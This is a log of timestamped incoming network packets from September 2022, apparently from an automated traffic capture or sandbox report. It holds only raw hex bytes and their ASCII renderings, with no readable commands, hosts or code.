                                                                                                                                                    2022-09-29 12:59:21 UTC30714INData Raw: 24 9d 1f 34 73 62 b0 e9 af 39 bf 71 f1 01 f4 6e b2 e6 bd 59 7a 35 0f d1 91 77 83 f1 bb 83 95 f3 03 d5 c3 84 c6 8f 5f 1d c6 49 c3 79 9d 0c ac 40 3a 97 29 ee e7 54 38 03 5b 76 c7 be 40 a9 6e 9a 6e 38 37 a4 6d 40 b6 0d 9c a6 fa 39 38 4b a9 0c a4 fb 88 60 b4 79 7b ee c0 aa a6 15 07 13 95 17 f8 ea 88 3b d4 ec f5 a1 38 81 f5 51 7c 37 6c f7 7b 94 de 3b 06 c8 60 3a c6 d1 5b 21 19 e6 e5 e9 a0 ec ec b5 ac 95 55 54 61 f6 7b 50 49 64 00 48 c2 2f a7 af bf a4 09 33 0b bc de 81 9d 1e a0 c5 08 3d ac 97 60 18 18 2b 36 d5 57 78 87 18 f9 7f 32 38 00 7a 37 18 03 84 14 29 70 bb a0 11 32 d9 89 28 be 00 6a 9c 34 5f d4 a2 5f bb f6 59 4d 03 6f 00 ab 53 13 5f 9c ef 54 b6 f8 61 f5 71 97 fb 73 37 df 9c 50 1f a0 5e e0 80 b1 0d a1 5f da 50 ed 7a d8 1e b8 a3 4c 7e 67 e8 dd 05 4b b0 97
                                                                                                                                                    Data Ascii: $4sb9qnYz5w_Iy@:)T8[v@nn87m@98K`y{;8Q|7l{;`:[!UTa{PIdH/3=`+6Wx28z7)p2(j4__YMoS_Taqs7P^_PzL~gK
                                                                                                                                                    2022-09-29 12:59:21 UTC30715INData Raw: 35 a6 44 4f 53 9c f3 c5 b6 02 13 03 15 4b e3 ba 0e f6 35 10 1a 3f af 1e 57 98 da c1 66 6f 50 65 59 80 29 b6 c9 e9 55 f4 82 90 ea 10 96 24 6d a4 5f b9 e4 e4 84 ca cb 98 53 a2 97 91 79 f4 f1 f0 a2 6c 21 fa 6c a8 19 41 f5 d8 dc ee b9 ce 4d a8 5b fb 98 c2 3a f1 cb 9a eb e6 5c cd 3b 08 d7 f0 e3 96 c5 59 15 7e ba d5 a9 3a 9e 86 cc 78 84 db 4f 2e be 9e 8c d5 39 3d cc 23 1a 85 79 98 0f 56 32 a7 e3 12 22 04 16 7d 8a 60 4f dd 97 78 b8 fc d6 c7 8e cb 80 e5 80 c8 52 ae a4 e6 ce f1 06 08 2e f6 79 41 38 20 a2 19 59 ab 41 88 64 95 3a 52 69 03 86 5e b3 f1 76 5f 67 6f 24 6f 56 f9 b7 73 58 cb b2 0d 39 d5 11 29 1e bb cd 75 0d e0 22 7c a6 ef 61 26 cc 9d 18 88 dc 6f 35 d5 c5 eb 13 08 3c fe ac 74 f0 47 db b1 06 c2 fe c3 50 08 1b 65 32 37 67 9e d1 30 42 37 09 bb 2f 47 90 44 43
                                                                                                                                                    Data Ascii: 5DOSK5?WfoPeY)U$m_Syl!lAM[:\;Y~:xO.9=#yV2"}`OxR.yA8 YAd:Ri^v_go$oVsX9)u"|a&o5<tGPe27g0B7/GDC
                                                                                                                                                    2022-09-29 12:59:21 UTC30716INData Raw: 1d 53 b0 f8 a5 d0 59 e8 f4 16 18 af d6 2f 35 06 95 d2 f5 5d 24 84 76 7e 5d 0a 0b c4 c3 4e af f4 38 59 1e 0f 73 4c 8a 2f f7 af 9a a7 cd 85 99 a7 98 52 b0 3a bc a0 16 96 87 a9 b1 74 8e 2f a3 ad de ed 91 27 21 fc 37 65 aa f6 70 ff a6 11 fa c9 d2 9e 40 18 b2 ba 7c 0c 47 33 f3 5c 79 8b ae f7 cb e8 5b 57 5e b0 01 1b 31 76 82 fa 2b 64 b3 59 29 39 05 21 b7 ac 4a 93 e7 36 7f d7 40 4e 4b 99 f3 c0 5d fd 53 a8 db 29 8d b5 d1 b7 57 64 15 90 ca 39 62 4b ba 67 9d 7d a5 51 ad 0a e3 3f 0d 69 7f 4a 8f f1 4b 1d da 45 7c e1 11 34 7b 39 5f c3 4d 0c dc b4 d0 45 15 ef fe d5 c7 fe f4 8c e9 80 89 b0 15 0b ae 41 31 33 67 80 b5 40 c9 ac 3a e5 3c e1 21 62 18 eb 7d 02 4f 6e be d0 8f 4e 37 20 b7 c2 e9 7d 41 d6 8a b1 f2 74 89 0a 5d e4 45 36 01 66 b2 b7 25 79 8b 68 49 57 d3 51 ca 46 9c
                                                                                                                                                    Data Ascii: SY/5]$v~]N8YsL/R:t/'!7ep@|G3\y[W^1v+dY)9!J6@NK]S)Wd9bKg}Q?iJKE|4{9_MEA13g@:<!b}OnN7 }At]E6f%yhIWQF
                                                                                                                                                    2022-09-29 12:59:21 UTC30718INData Raw: 68 a4 2e f6 5d 66 62 fc 78 b4 85 b7 54 b0 9b 59 8d 60 d0 20 7b ea 50 48 88 0f d5 e6 59 4c 52 92 52 4a d4 66 6b c8 45 06 1b 4f 7e 6f 1d ec a8 7b 84 cb 39 44 a8 55 4d d7 03 7f 7c 03 80 2d 84 9f 5a 6c fd 4e dc eb d8 c8 93 7b de 84 6a 13 67 ce 4f a6 4e 53 d8 e6 45 44 84 2f 4d 16 a6 9c b3 68 7b 11 9a c8 89 d8 3c af 0b 17 30 92 12 31 f3 2e 9b ba c2 b0 d2 90 42 c3 d9 e6 92 93 25 78 a4 3e 9b 6e e2 43 43 af 1d 76 7b 28 c4 ae de a4 3d a1 04 b8 28 a1 79 84 3e ce ef 0f ac 4b a2 67 fc f0 ba 46 0e 25 cb 8b ff 83 77 5e 02 50 cf 61 ca 77 93 63 a1 18 a1 38 f8 da 70 1a ef 16 d4 a9 a1 1d 70 00 82 86 a2 62 d6 f2 c3 12 f4 a9 37 0d 38 e1 d9 b4 84 7b 93 42 f9 9c 33 7b 44 79 05 b7 99 ab 56 02 9b 90 e5 c9 e9 45 cc f8 1c d5 76 46 6e 19 21 68 43 19 e1 ca 12 26 64 a2 7f c6 ba 8e d8
                                                                                                                                                    Data Ascii: h.]fbxTY` {PHYLRRJfkEO~o{9DUM|-ZlN{jgONSED/Mh{<01.B%x>nCCv{(=(y>KgF%w^Pawc8ppb78{B3{DyVEvFn!hC&d
                                                                                                                                                    2022-09-29 12:59:21 UTC30719INData Raw: 17 e9 85 51 65 a2 26 a4 11 e9 d7 34 fa e5 53 c4 dd 3c ad 18 cf fb 2a a5 13 54 ad ba ae a8 ce 76 09 af 68 8b 09 5a af b6 c2 5d 2a 67 49 df aa ee 4f c9 6e d7 d4 38 93 4a d2 17 69 99 a3 e3 a6 08 d2 94 bf e3 6c 95 49 c3 dc dc a2 17 1c e3 68 fc 18 36 8f 43 a0 87 63 6e 2a 98 83 07 ea 34 9e ab ba 38 4d dd 4c 05 07 bd 68 c7 c8 9a 0a 51 20 84 45 42 79 ec e2 dc cd ae 74 ca b9 21 b5 d0 1b 99 e5 45 a6 d6 d2 75 d0 d0 c4 fc 18 bd d5 33 d3 eb 7c 60 59 38 b7 fd dc cf dd bd 08 ac 17 dc f6 87 d5 09 66 83 07 d4 ca 74 28 89 9b 2c 47 2a e2 a9 cc 7d 95 94 a2 5f 15 ca 79 37 fb 53 f0 03 7f eb ca 43 f3 32 06 cd d4 54 9c b2 45 b8 e4 a9 5c 04 3e 8d 0e 93 61 be 5e 5e e1 fb a4 04 0d 72 37 24 db 40 80 fd f2 e0 a7 84 9c 29 fa 8d a1 9c 03 4f d7 39 9b 2a b8 e4 d9 4f 84 fd 01 3b 1a 59 6b
                                                                                                                                                    Data Ascii: Qe&4S<*TvhZ]*gIOn8JilIh6Ccn*48MLhQ EByt!Eu3|`Y8ft(,G*}_y7SC2TE\>a^^r7$@)O9*O;Yk
                                                                                                                                                    2022-09-29 12:59:21 UTC30721INData Raw: c9 a7 ea 47 ae 61 39 e7 46 af f2 0a 64 9c df e0 10 48 ab c2 fc 56 bb 2d cc 8d 8b 82 9f f6 07 82 ef 60 22 e4 1c 12 bc fc d3 55 af 3a 1b 10 6e 84 d6 a1 e2 e1 65 94 06 47 a9 b3 b0 ce 71 6e c2 1a 9b 69 19 3c 9b 6a c9 03 6f 23 c3 57 23 79 1a 6a 26 09 12 31 97 fe 2b 84 29 84 6a f3 92 46 7b 93 20 23 3f 56 d2 df d0 d7 9d 33 1f 45 6a c3 84 b5 84 fe 00 57 1b d6 2c 7d f4 dc dd 3e c6 1d f2 17 51 13 f1 1e ec b9 8e 26 31 78 16 02 1d f2 d8 07 77 1a de 4a 01 51 61 5a d5 b5 9e 13 24 af 62 c3 d9 38 f5 34 2a be c7 a1 db 76 b0 00 4a b3 f1 e4 ce 54 7a bc 70 5a 2a 47 69 e1 c9 8b 9c f6 11 f8 8b 84 79 97 42 11 b1 32 31 42 50 91 51 4d f9 f7 0a 4a 31 68 fc 3a a9 3e d9 70 2f b7 96 72 75 85 5c a8 18 c7 ce ae 74 d5 fb 70 39 12 81 58 7a 9f dc 4a 0a cb f4 75 aa 11 f0 3d 5e 0b c3 47 17
                                                                                                                                                    Data Ascii: Ga9FdHV-`"U:neGqni<jo#W#yj&1+)jF{ #?V3EjW,}>Q&1xwJQaZ$b84*vJTzpZ*GiyB21BPQMJ1h:>p/ru\tp9XzJu=^G
                                                                                                                                                    2022-09-29 12:59:21 UTC30722INData Raw: 9d ad 92 cb db d2 f7 9a 7a cb 21 93 8b b0 b5 ba d2 87 0a 43 e5 4c ec d6 bc 74 b5 11 1f c8 97 e5 00 e0 0c f1 f6 23 08 4c 10 7f 8f 75 8d 02 d6 19 77 90 fd 32 ce 0f 43 f1 63 4c c9 63 20 4c 02 a5 7c 62 f0 70 e3 b0 3c 91 09 82 9a a9 0f 34 e9 e7 b0 e3 e1 3b 7c 48 f6 13 29 ee ca 1e da 52 e8 b4 53 4e 84 78 29 da c6 87 4e ce 79 dd 1c 30 58 86 da 8c 64 7c b7 4b c2 a3 4d a4 e0 75 9d 76 5a 83 81 c2 38 4c 03 97 66 3e f3 2b fc 20 07 37 41 c5 21 57 8e fd 41 eb 4a e6 b4 25 98 d9 b8 18 cc be 2b f1 b8 d5 ae cc eb 56 1e ca 34 42 22 18 01 61 a3 4b 30 7f c7 92 e2 20 77 28 9a 83 ec 12 c9 88 e0 99 e8 1c ab d2 73 52 28 f9 db cd 65 85 19 32 9c 79 f1 8d f5 b6 35 fb 2e eb 50 f2 84 0d db 54 18 3d 0c 44 89 e0 96 2d 6b 71 72 a3 67 15 0c a7 2a 26 b4 05 99 3b 33 2e 57 bf 91 de 1f 87 1f
                                                                                                                                                    Data Ascii: z!CLt#Luw2CcLc L|bp<4;|H)RSNx)Ny0Xd|KMuvZ8Lf>+ 7A!WAJ%+V4B"aK0 w(sR(e2y5.PT=D-kqrg*&;3.W
                                                                                                                                                    2022-09-29 12:59:21 UTC30723INData Raw: 26 4b ed 09 66 46 1f dc 35 76 25 3f 7b e1 93 4b 4a 0e 7e b1 a4 29 bb 22 92 02 a8 f3 20 e3 5b 94 cf 2e 04 d9 32 69 37 a4 36 14 39 21 46 50 5c b3 da c4 fe 51 47 0d b8 1c 5a c0 70 f3 5f 71 e3 40 cf 6d 06 e7 e3 76 17 d1 f6 27 00 0a 30 17 b8 be 2b db 8a cd c7 d0 74 63 25 eb f1 d5 6b d1 48 88 9c cd c4 72 13 50 62 cc 51 6e fb 7d 30 d3 cd a9 63 f0 ce 00 8c 1d 8b a3 05 b0 a1 47 3f b0 2b 15 f5 b6 ed 22 99 87 2b 6c 68 2a e2 4d a0 9e a5 f3 6a 46 96 a9 3c d2 df b6 57 ea e3 c2 8b 3b 3f 58 b0 be c4 48 c2 d0 56 9a 35 ab 12 be 0f a3 ec f1 eb 64 73 f0 50 95 1e e3 ec 7b ad 39 27 c1 80 1e e2 c0 b5 13 6c 66 c4 8f de 71 42 74 a7 e9 01 3a 5f 82 ee 45 da 70 31 64 a3 4b fd 73 84 79 2a 67 88 54 2f 01 44 b8 c3 bc 7a dc f3 27 a7 c9 d6 35 08 e7 2c 3a 55 bc 29 c9 30 9d 6e ff f4 a1 89
                                                                                                                                                    Data Ascii: &KfF5v%?{KJ~)" [.2i769!FP\QGZp_q@mv'0+tc%kHrPbQn}0cG?+"+lh*MjF<W;?XHV5dsP{9'lfqBt:_Ep1dKsy*gT/Dz'5,:U)0n
                                                                                                                                                    2022-09-29 12:59:21 UTC30725INData Raw: 48 29 e8 38 15 a4 08 d3 6f 9f e6 30 eb 2b cd de ab 38 0f ef 7e bb b9 f8 24 15 d9 20 96 26 6b d4 00 3d de c8 7a 29 b9 bc 31 77 9c f3 bd 3b f1 c5 a1 70 24 fa be 8c b5 90 13 cd d5 73 8a 6b 7d 01 52 89 3d 4c 22 ea 1f bd 00 f2 b6 b6 8c c8 9c e8 cf 5f a2 5b 44 10 a0 63 e8 7f e0 31 05 c7 12 82 30 30 74 d5 c3 ec 29 68 95 59 93 c9 a9 ae d2 40 f0 fe 63 7f de 46 a8 57 f9 49 bb 2a 0a 24 3e 7c dd 85 ae 3f 4e 9f a5 3f 6c 2e db 98 77 0c d9 4d 6a 12 f5 15 3c 40 22 ff 15 bf 7f 82 25 1f b2 7b 57 1b 90 cd c3 1b b7 19 76 4d e2 b7 16 dc 81 53 84 39 6e 22 7e ba 3b 51 e8 c1 52 62 a3 7c 26 de 7c cd b2 0d 2c 01 a9 21 ce 3a f9 2d cc af d7 02 07 23 0b a9 41 b5 1b f4 e0 79 d3 f2 3c 20 5b 9e d2 00 1b 31 51 df d6 e1 6a 0b 27 c9 97 a0 58 d5 37 ab 2b 08 3c 8c a4 41 53 f5 ca 34 93 04 15
                                                                                                                                                    Data Ascii: H)8o0+8~$ &k=z)1w;p$sk}R=L"_[Dc100t)hY@cFWI*$>|?N?l.wMj<@"%{WvMS9n"~;QRb|&|,!:-#Ay< [1Qj'X7+<AS4
                                                                                                                                                    2022-09-29 12:59:21 UTC30726INData Raw: 5e 8a a6 2d 6f e3 09 00 fa ec 5b 0c da 38 22 7a b9 6b 22 66 bf 7e 71 ec e5 d6 32 ce c2 65 c8 85 73 d6 b5 58 e3 05 65 2a 16 cd 60 43 26 e7 b2 99 ec d3 ab 8f d7 6d d5 50 ee f0 fb e4 2b 52 f5 35 c9 14 be 2c 16 a1 06 84 2c bf 3d fb 9b e0 2e 12 8d 33 d4 6e 74 03 bd 49 88 a7 c4 69 2d 7c 61 17 01 91 d1 ab 55 a9 d7 3a e9 79 0e ae 3e 25 a2 56 ef ec a4 63 92 0c 0c 8d 9c 84 bb b0 43 a1 e1 00 83 74 85 71 a0 dc f6 33 80 62 77 6e 05 17 fd 94 c3 5e 77 1e 4a 18 48 f1 a6 54 2a e3 08 d9 55 30 46 3e b8 06 f5 b9 de 13 6a 5a e8 8d 0d 59 65 3e 4a c3 ee 3c 43 6e c6 f4 83 8d 9a 58 3b b8 73 5c f8 ac 22 f1 71 96 e4 94 67 64 da 89 01 4d 14 10 7d 34 94 33 a9 c9 34 16 78 93 d4 ad e2 5a 15 05 a0 94 25 2a 78 88 51 ac e3 6c 6d fa 68 88 cd 3e f6 14 ac 5d d9 a7 72 f6 9d cf 44 4c 3a f8 fa
                                                                                                                                                    Data Ascii: ^-o[8"zk"f~q2esXe*`C&mP+R5,,=.3ntIi-|aU:y>%VcCtq3bwn^wJHT*U0F>jZYe>J<CnX;s\"qgdM}434xZ%*xQlmh>]rDL:
                                                                                                                                                    2022-09-29 12:59:21 UTC30727INData Raw: dc 8f 92 c7 cc f4 e2 fe 05 ce db 28 bb 99 6b 64 3a 16 df d4 ca 94 aa 1d e8 0a 41 74 5b ad f6 02 43 6d ba 19 fb 61 07 9e 21 b2 3a c9 1a 9b e4 00 78 69 92 9f be 48 81 ff ce 43 84 b0 fb 6e 9f 52 df 99 31 35 f6 14 8d 1b 18 43 4a c4 01 11 6c 6b 49 b0 6f 28 e6 7a d5 45 26 6b d3 99 e5 65 e5 41 40 b8 7b d3 f3 f3 d5 d4 bc 93 18 81 7e fa d1 5a 29 13 5d eb db 75 63 d5 07 c2 15 04 15 e3 c1 3c fd cc cb f2 cd 28 7b 39 08 ce dd e4 73 d7 8e e7 c2 b1 3f 62 db ef 62 47 69 34 11 1e 68 5c 47 7b da c1 0c 5a 68 14 23 de be 93 57 18 62 0b 72 70 75 46 29 70 71 42 0e a6 b6 f1 79 91 fd 57 6a 89 71 26 a2 82 65 bb f7 38 9c 1b ed f2 c0 1b 10 58 56 0e 7a 9b 2c 72 0e 2d 77 3d aa 66 1d f3 c9 ff 3d e2 6b 0c 94 fb fc f2 89 64 5c 3c 10 7e 64 73 5d ac 93 cf a2 af 05 32 98 2b 2a 96 56 b7 2a
                                                                                                                                                    Data Ascii: (kd:At[Cma!:xiHCnR15CJlkIo(zE&keA@{~Z)]uc<({9s?bbGi4h\G{Zh#WbrpuF)pqByWjq&e8XVz,r-w=f=kd\<~ds]2+*V*
                                                                                                                                                    2022-09-29 12:59:21 UTC30728INData Raw: 32 d6 57 70 e3 e0 55 3d 3a 83 5b 22 0c 6c 1f 01 d4 53 70 89 a0 27 e8 0b 1d 37 29 0b 5b 0b 67 48 2e b4 98 64 49 fa 07 71 3a 40 40 00 4d 24 f5 d4 7d a7 6d e4 8f 7a 05 35 87 cc f7 b4 b0 40 cd e2 b9 81 60 96 49 2b 24 4d 7b 5a 35 5e 45 c7 d9 c2 b4 7c 24 69 79 ca 2e ca 8f 8b 44 23 c4 97 fe 70 86 57 30 e9 f8 10 a1 63 e1 e1 f0 2d ec b5 a8 ad 1c 82 6b b2 6b 59 48 87 91 3e 5f af d5 75 75 62 72 bf 84 68 59 9b 4e 6f 72 66 58 e1 5c a3 76 1b 1a 9e 13 6b fa 01 3d 26 cc bb b0 6e 21 07 50 5a b1 7e d4 6f d8 3f 53 18 b8 88 4f d4 8c 9f b4 7c 12 eb 51 00 c8 cd 73 e6 ea 77 fb 75 27 fd 02 24 26 e7 50 56 b1 80 9f 1f d3 72 bb 07 ae 98 c0 d1 06 99 43 4d bc 91 c0 aa cd 45 e9 80 31 23 0d c3 b5 c3 08 f3 13 86 46 91 55 b7 99 5c 29 41 2e 8f 9d 27 db 87 23 51 e2 cc b0 16 1e fe ed b5 21
                                                                                                                                                    Data Ascii: 2WpU=:["lSp'7)[gH.dIq:@@M$}mz5@`I+$M{Z5^E|$iy.D#pW0c-kkYH>_uubrhYNorfX\vk=&n!PZ~o?SO|Qswu'$&PVrCME1#FU\)A.'#Q!
                                                                                                                                                    2022-09-29 12:59:22 UTC30744INData Raw: 1b c3 42 3e 4a 64 ca 93 06 47 60 b8 2b 61 b0 7f 7b b4 80 e7 32 28 20 2e b9 f3 66 6f 10 13 38 4c e0 9c ef 4f 8c e3 27 a8 61 1d 7f 25 82 67 8f 0f 5b 7e bf c0 8f 86 6d 34 89 8d 1c 5c c4 e5 83 6e d4 69 61 2e 29 d2 d9 c2 3d 81 b6 5c 15 7e 47 21 ed ea 70 a0 3c 3f 97 ac 4c d9 8d 23 73 d4 db 39 44 14 46 6e 1d b1 dc 0a 7d 73 b2 b9 15 34 e0 99 42 55 9a 09 75 75 17 f3 0f 57 b0 eb ad df da 26 af 6b 7a cc e4 b6 09 53 f9 28 d1 6c 55 31 08 98 86 f7 37 9e 6f 55 27 ca 8e ef 55 ef 7a b9 bc ce 9e 46 b6 09 86 62 bf 7f bc 41 8e b1 5e 4b de 0f 3f e5 06 ce e9 9a 3e 0c c4 9f 60 a7 ab 79 3f b5 81 9b 46 e9 e9 d2 e3 99 7c c3 21 ef ee b3 33 cf d6 ca de 50 49 c4 ea 3f d0 5e 9b 21 87 98 81 33 1f ae 82 25 b8 23 48 41 44 c2 28 e6 89 d7 fc 40 df f4 02 74 75 71 8d e9 3d fb 06 e5 9f 20 74
                                                                                                                                                    Data Ascii: B>JdG`+a{2( .fo8LO'a%g[~m4\nia.)=\~G!p<?L#s9DFn}s4BUuuW&kzS(lU17oU'UzFbA^K?>`y?F|!3PI?^!3%#HAD(@tuq= t
                                                                                                                                                    2022-09-29 12:59:22 UTC30760INData Raw: 7e 11 0a 15 70 a9 8a 0c 45 b3 55 4b 1c 6b 7f d0 47 23 23 20 ef 64 e5 b8 29 43 c9 1e 52 67 22 19 b5 ba a0 21 c2 39 f7 00 75 d3 9c b4 f0 ee 5e b3 0c 40 25 e9 d3 b1 49 9b 6c 90 6d f7 ef 8b 78 b2 93 1a 00 59 33 56 b8 40 1b c2 58 db 53 1f f1 a7 7f 2a f5 25 9b 6c b5 3a b4 58 93 09 5b 34 fa b4 ea e0 66 67 9c 65 ec 6c f6 a7 6b 0f 5d 0f d5 c0 34 f9 16 c6 74 63 d0 12 50 40 90 03 d9 55 6d 67 4f b5 d2 fc b2 4a 81 6a 89 ad 12 d0 64 cf f2 86 2a 27 ef e0 c7 d9 73 c4 79 4c 10 11 31 f8 a4 48 bc b3 8e 11 8f 86 af e7 8f e2 84 f9 b8 49 ca 6d 58 ee de 34 8c 47 9f 1b e2 b7 42 95 bc fc b5 6a fe b2 3f 18 86 96 39 be 7b 6a 79 2b a7 84 1f 29 42 72 d3 a7 30 f6 09 77 ba 64 dc e1 7c 86 6e bd 15 fe 0f 93 e2 89 7f 2d 36 81 97 60 3a f0 01 37 b8 dc c9 e5 8c fb e2 39 87 d8 64 83 e3 d7 68
                                                                                                                                                    Data Ascii: ~pEUKkG## d)CRg"!9u^@%IlmxY3V@XS*%l:X[4fgelk]4tcP@UmgOJjd*'syL1HImX4GBj?9{jy+)Br0wd|n-6`:79dh
                                                                                                                                                    2022-09-29 12:59:22 UTC30776INData Raw: bd cc 28 00 7b c0 c8 22 39 03 01 a0 06 8b f5 77 89 6b d8 42 e7 fd 65 08 c8 46 54 e0 57 91 77 1d 13 99 80 1c 7a f5 38 18 ba a1 f5 e5 a6 92 69 5c ed 1b 48 7b 31 fd 27 eb 33 36 bb 86 17 e1 8f 68 6f 53 3e df 39 d7 e9 1e f2 62 75 e1 07 74 b3 d2 32 d9 8d 1d df 71 bc fc e5 bb 0d 4c ab 1b 1b dd 40 48 27 f6 0d 04 bf 03 df f6 b7 c9 d8 fe 96 b7 f9 eb 48 8b a8 68 38 3b 5a 07 68 34 0f 65 d3 b6 77 d7 2d 7b e5 9c 69 1b 8d 44 ef ce 4b 6e f0 8c 7b c1 e8 d6 d0 7e 05 f8 d3 0b a7 c3 26 dd ba db ca 61 00 87 4f 3d ed c8 98 96 34 51 18 c4 8d 0f 0e 00 ea 63 8f b4 a6 dc 1c a3 1c 26 fa 55 c0 7b c7 e2 e7 eb 05 ce 36 07 af 84 c0 fa 00 d9 81 6c e4 59 9c f7 cc 43 e7 4d 16 31 a6 21 aa 72 04 b2 98 cc 62 67 65 3d cc 47 0b be 3b 4f 1a 41 6a 00 00 5c 69 a1 e3 b8 ba a5 c7 42 02 c6 b5 62 bd
                                                                                                                                                    Data Ascii: ({"9wkBeFTWwz8i\H{1'36hoS>9but2qL@H'Hh8;Zh4ew-{iDKn{~&aO=4Qc&U{6lYCM1!rbge=G;OAj\iBb
                                                                                                                                                    2022-09-29 12:59:22 UTC30792INData Raw: 8c 00 dc ee 0a 6e 18 f3 63 20 e9 8b 8b 09 39 7b 40 61 a9 05 3e f0 11 79 df 58 33 d2 1f e6 8f b8 c5 d4 3c c1 1f 7a e7 a9 7e a4 a3 38 21 4f bd f0 3b ba 18 0c 93 5b b8 15 09 ff c9 66 5b 9b e6 7d e8 b2 7d ca 87 63 aa 89 50 b7 4f 9f ef 32 70 f3 4b 10 de c2 b1 97 39 81 b6 38 2a ab 17 62 6a 8f 70 8b 00 ec 75 c5 ba b8 da c6 49 05 d5 29 67 e6 da d7 84 1d 0c ea e0 7e 73 38 30 98 6f eb 6b e6 bf 37 1c 08 95 d5 30 91 a3 64 12 53 c6 1e 6c a4 50 6d 76 f0 66 6d 89 30 f9 da 4e f4 be 37 81 31 dc 14 6a 9f d1 e1 ee cb 13 73 ab 3e 08 fe f0 a6 0f f9 41 15 10 49 11 8b d6 68 f7 6e da 87 f3 5d d8 63 32 e8 85 77 9c c6 a9 39 3e a1 ba 38 1e cd 5f 22 ec 5c 64 e7 87 1e 5b de 6b 6d a8 d9 a2 52 05 b0 34 89 1a fe 7d 97 3c 8e c9 be ac 34 9a 4e dd ee ab 8c 59 61 61 ad 5a fc 70 7b 4d f1 01
                                                                                                                                                    Data Ascii: nc 9{@a>yX3<z~8!O;[f[}}cPO2pK98*bjpuI)g~s80ok70dSlPmvfm0N71js>AIhn]c2w9>8_"\d[kmR4}<4NYaaZp{M
                                                                                                                                                    2022-09-29 12:59:22 UTC30808INData Raw: f4 0f 73 21 a0 98 ef 08 38 35 d7 02 35 95 90 17 52 1f 76 c4 48 52 74 02 a0 9b c6 ce 74 93 48 e8 0a d6 55 8c f4 39 a1 e5 68 2d f0 9c 29 38 60 f6 1a ed 8b f3 b2 b1 56 96 10 bb 68 17 6b 26 39 1a 7a 97 7c bb c1 e9 f1 cc f2 fb d1 00 8a 76 0d 98 66 55 ad bb e8 65 b6 a7 90 43 69 8a 57 d5 23 79 fe 36 a6 7f ea a7 ca 57 d3 ad 7c 1c 7c b7 8b f7 a6 ff 31 f2 4e ce 2d 15 1c de 57 55 12 bc c6 a6 71 c4 37 b8 2e 32 d5 3f b6 f9 1e 12 5c c4 28 23 d7 34 e1 92 4b 8e 33 ad 37 bb 79 00 a4 8c 4c 0f e2 11 c5 81 46 3f c5 41 b3 cf 65 96 86 6d fe 62 df 7c f7 dd 99 19 64 bb 28 36 96 d3 7a c2 17 9b e3 de 94 f9 1a 0d a2 22 30 17 c5 ad ca fb 7c fa 18 96 7f 5f 10 f4 f8 d2 56 33 0e 1b 7f 2c c0 5b 57 27 46 1b 9f 3c f5 db d3 02 55 5d 50 78 56 d9 21 b9 d5 da b7 6a dc e1 d6 94 3b f8 a4 c2 2f
                                                                                                                                                    Data Ascii: s!855RvHRttHU9h-)8`Vhk&9z|vfUeCiW#y6W||1N-WUq7.2?\(#4K37yLF?Aemb|d(6z"0|_V3,[W'F<U]PxV!j;/
                                                                                                                                                    2022-09-29 12:59:22 UTC30824INData Raw: e0 20 8d eb 81 7b 6d f9 f3 61 25 6d 81 97 72 93 fb 9b b1 ab c1 5c cb ae 8b e6 76 09 c2 6e b5 bb 48 29 80 99 7f e5 58 ce 26 bc ba a9 be d6 69 49 f2 b7 b6 23 0d b4 be 10 3e 79 c5 2d 62 af 59 3c 16 a7 18 17 4d 6b af 56 44 2a e2 19 b6 0d 9a a9 f4 b0 a6 34 5e 6b 0e 50 fa b5 fe 4f 8e 49 f9 e0 4d 85 94 1a 87 67 76 66 da d1 91 c6 e3 86 b3 e0 f3 17 bb 0b f7 5b fd ae 92 2d 23 78 66 90 6d dc 26 67 8f 8d e4 ae 05 b5 b9 23 2c 4a 78 15 2e fd be 1c f6 87 88 8f cc 05 96 9f e5 2f a4 ed 57 f3 cb af 78 9d fa 3f 46 5d 25 bf ae 6d ec ed 00 de af 76 fb d7 7c 71 2d 29 77 01 12 50 09 86 bb 08 28 d4 86 83 96 6c 9d dd b9 81 e0 5a e7 d7 66 a1 fc 2f b5 97 72 19 e5 25 c6 29 f6 29 f5 0a b6 9c 44 7b 90 0e 41 e8 ea 1d fa ee 39 35 f7 d9 43 21 26 53 79 0d f2 cb cf a8 04 70 47 c6 92 c3 0e
                                                                                                                                                    Data Ascii: {ma%mr\vnH)X&iI#>y-bY<MkVD*4^kPOIMgvf[-#xfm&g#,Jx./Wx?F]%mv|q-)wP(lZf/r%))D{A95C!&SypG
                                                                                                                                                    2022-09-29 12:59:22 UTC30840INData Raw: 73 eb 07 fa 85 9a 73 7d 64 82 ff 4a 04 c3 65 88 3e fb 2c 9a 57 6c 01 4e 42 58 f0 e8 18 40 f9 22 f3 4e 29 21 c1 7a ed cc 8a ce ac 91 02 09 87 7c 57 10 11 42 41 92 19 f2 a2 9d 26 f5 25 d3 d4 13 4b b0 f4 8c 7a a7 45 34 08 5b 69 d0 64 63 89 e9 02 27 e7 04 8d b4 44 15 1e 96 d8 1c 79 5f 7b e8 8c 89 74 13 9e a6 4a cf 69 06 86 14 3f 80 25 01 e9 3c 2d 2f e7 60 b9 dc 28 bd 7c 17 7b 33 89 e8 c1 d0 0d e3 82 67 24 95 75 2b cc 04 73 fe 29 e0 1a 0f 3a b4 a3 2d df b6 c7 46 3f 73 79 f9 be d7 f8 04 42 48 d3 f1 1a 96 6c 66 7d 51 e5 49 d4 10 4b 1d af f3 e6 c5 85 39 27 9d 4c 74 c9 74 a4 ba 1a 8d 62 34 27 fc 52 71 2b 72 ff e4 69 d1 da 61 58 be a0 f1 bc 18 1b ad eb d9 6c e6 8b 43 12 c2 1b c9 83 10 b0 a1 f8 ef cd 26 12 14 06 84 07 9e d3 b7 96 40 ed 41 18 78 c0 20 58 c1 c7 e0 56
                                                                                                                                                    Data Ascii: ss}dJe>,WlNBX@"N)!z|WBA&%KzE4[idc'Dy_{tJi?%<-/`(|{3g$u+s):-F?syBHlf}QIK9'Lttb4'Rq+riaXlC&@Ax XV
